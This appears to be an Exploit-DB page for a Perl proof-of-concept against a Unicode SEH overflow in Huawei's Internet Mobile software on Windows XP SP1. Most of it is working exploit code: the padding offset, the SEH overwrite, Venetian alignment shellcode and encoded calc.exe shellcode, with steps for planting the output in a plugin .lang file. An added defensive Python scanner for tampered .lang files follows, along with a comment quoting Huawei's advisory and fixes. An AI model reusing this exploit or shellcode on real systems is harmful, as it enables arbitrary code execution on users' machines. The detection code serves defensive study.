Huawei Technologies Internet Mobile Unicode SEH Exploit
EDB-ID: 21988 | CVE: N/A | OSVDB-ID: 87008
Author: Dark-Puzzle | Published: 2012-10-15 | Verified: Not Verified
Vulnerable App: N/A
#!/usr/bin/perl
# Souhail Hammou - Independent Security Researcher & Penetration Tester.
# Facebook : www.facebook.com/dark.puzzle.sec
# E-mail   : dark-puzzle@live.fr
# Greetings to all Moroccan researchers and white hats.
####################################################################################
# Vulnerable : Etisalat , Vodafone , Meditel , Maroc Telecom , Royal KPN , Cell C , STC ...
####################################################################################

# Title : Huawei Technologies - Internet Mobile 0day Unicode SEH Based Vulnerability.
# Author : Dark-Puzzle
# Versions : All versions are vulnerable; the behaviour of the program when exploiting may vary from one OS to another.
# RISK : Critical.
# Type : Local.
######################################################
# Video : https://www.youtube.com/watch?v=pkOaPQJPQbE (Windows XP SP1 + Windows 7)
#####################################################
#---------------------------------------------------------------------
# Use it at your own risk #
###---------------------------------------------------------------------
# Info : This exploit works only on WinXP SP1. It is almost impossible to execute it on Win7 & WinXP SP2/SP3 because
# the program has been compiled with SafeSEH enabled, so on those versions of Windows you will not find any valid
# Unicode-compatible address in a module without SafeSEH, neither in OS modules nor in program modules.
# Anyway, this exploit works perfectly on Windows XP SP1.
# Here it is; the video explains the usage =) : http://www.youtube.com/watch?v=pkOaPQJPQbE (Windows XP SP1 + Windows 7)
###

# So first go to C:\program files\Internet Mobile\plugins\SMSUIPlugin\SMSUIPlugin_fr-fr.lang or _en-fr.lang (according to the program language).
# Then put the output of this Perl program in <item name="IDS_PLUGIN_NAME">HERE !!</item>, save it and open the program.
# Unlike on Win7 & WinXP SP2/SP3, this exploit requires you to click the menu "Operation" --> "Message texte"
# (English : "Operation" --> "Text Message"). Bingo, calc.exe just showed up =).

use strict;
use warnings;

my $size = 43680;                       # total padding size of the generated input
my $junk = "A" x 146;                   # offset to the SEH record
my $nseh = "\x61\x62";                  # popad + align
my $seh  = "\x88\xDC";                  # p/p/r from OLE32.DLL (Windows XP SP1 only)
# The Venetian shellcode :
my $ven =
"\x6e". # align code
"\x53". # push ebx
"\x6e". # align code
"\x58". # pop eax
"\x6e". # align code
"\x05\x17\x11". # add eax, 0x11001700
"\x6e". # align code
"\x2d\x16\x11". # sub eax, 0x11001600
"\x6e". # align code
"\x50". # push eax
"\x6e". # align code
"\xc3"; # ret

my $more = "D" x 108; # exact value to make the Venetian shellcode work

# calc.exe shellcode.
my $shellcode =
"PPYAIAIAIAIAQATAXAZAPA3QADAZA".
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA".
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB".
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K".
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL".
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55".
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V".
"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB".
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT".
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU".
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM".
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC".
"QQ2LRCM0LJA";

# Pad the rest with "D" up to $size (same value as the original literal 43680).
my $morestuff = "D" x ( $size - length($junk.$nseh.$seh) );
my $payload = $junk.$nseh.$seh.$ven.$more.$shellcode.$morestuff;

open(my $fh, '>', 'mobile.txt') or die "Cannot write mobile.txt: $!";
binmode($fh);                           # write the raw bytes unchanged
print $fh $payload;
close($fh);

print "Huawei Technologies Unicode SEH Based Overflow\n";
print "\x44\x69\x73\x63\x6F\x76\x65\x72\x65\x64\x20\x26\x20\x50\x6F\x43\x20\x42\x79\x20\x44\x61\x72\x6B\x2D\x50\x75\x7A\x7A\x6C\x65\n";
print "Creating Input Please Be Patient\n";
sleep 5;
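Added example, not part of the original exploit or of Huawei's advisory: a defender-side tamper check in Python for the SMSUIPlugin .lang file the exploit modifies, flagging an <item> value that is far longer than a plugin label or is not valid text. It assumes the file is ASCII/UTF-8 XML; the 64-byte cap and the sample values below are constructed.

```python
import re
from typing import List, Tuple

# Assumption: the .lang file is plain ASCII/UTF-8 XML at the path given on the page.
LANG_PATH = r"C:\program files\Internet Mobile\plugins\SMSUIPlugin\SMSUIPlugin_fr-fr.lang"

# A plugin display name is a few words; the exploit reaches the SEH record only
# after 146 bytes. 64 is an assumed, deliberately conservative cap.
MAX_ITEM_LEN = 64

ITEM_RE = re.compile(rb'<item\s+name="([^"]+)"\s*>(.*?)</item>', re.DOTALL)


def scan_lang_bytes(data: bytes) -> List[Tuple[str, str]]:
    """Return (item_name, reason) pairs for <item> values that look tampered."""
    findings = []
    for raw_name, value in ITEM_RE.findall(data):
        name = raw_name.decode("ascii", "replace")
        if len(value) > MAX_ITEM_LEN:
            findings.append((name, f"length {len(value)} exceeds {MAX_ITEM_LEN}"))
        # Raw control bytes never belong in a display string.
        if any(b < 0x20 and b not in (0x09, 0x0A, 0x0D) for b in value):
            findings.append((name, "contains control bytes"))
        # A real French/English label is valid UTF-8; address bytes such as the
        # 0x88 0xDC pair in the exploit above are not.
        try:
            value.decode("utf-8")
        except UnicodeDecodeError:
            findings.append((name, "not valid UTF-8"))
    return findings


def scan_lang_file(path: str = LANG_PATH) -> List[Tuple[str, str]]:
    """Scan an on-disk .lang file (returns an empty list when nothing is suspicious)."""
    with open(path, "rb") as fh:
        return scan_lang_bytes(fh.read())


# Constructed samples: an untouched label and one overwritten with an
# overflow-style value (long run of 'A' plus non-UTF-8 bytes).
BENIGN = b'<item name="IDS_PLUGIN_NAME">Messages</item>'
TAMPERED = (b'<item name="IDS_PLUGIN_NAME">' + b"A" * 200 + b"\x88\xdc"
            + b"D" * 100 + b"</item>")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("tampered", TAMPERED)):
        print(label, scan_lang_bytes(sample))
```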

Comments
Posted by dookie2000ca on Friday, Oct 19 2012 at 7:40 am
Received From Huawei:

The Huawei Security Advisory link is as below:
http://www.huaweidevice.com/worldwide/faq.do?method=getFaqInfo&questionId=7594
and the solution for this vulnerability is as below:
“Currently, workarounds are available and are listed below. Huawei has also made the version plan to resolve this vulnerability.
Temporary Fix
Users of Windows can upgrade the operation system to Windows XP sp3 directly or can download UTPS2.0 from our web site to cope with the security vulnerability.
1. Users of Windows XP sp1 can log in to the Web site of Microsoft to install the patch Windows XP sp3.
2. Users of the operation systems of higher versions will not be affected.
Software Versions and Fixes
The below affected products can deploy the workarounds mentioned above to mitigate the risks, or be upgraded to the below versions:
Product Model   Back-End Version        Solved Version                               Solved Time
E173u-1         UTPS11.302.09.06.162    UTPS21.005.22.00.162_MAC21.005.22.01.162     2012-9-26
E153u-1         UTPS11.302.09.05.162    UTPS21.005.15.06.162_MAC21.005.15.01.162     2012-9-26
The other affected products can deploy the workarounds mentioned above to mitigate the risks, and there is no new version or patch to be released.

Best Regards
Huawei PSIRT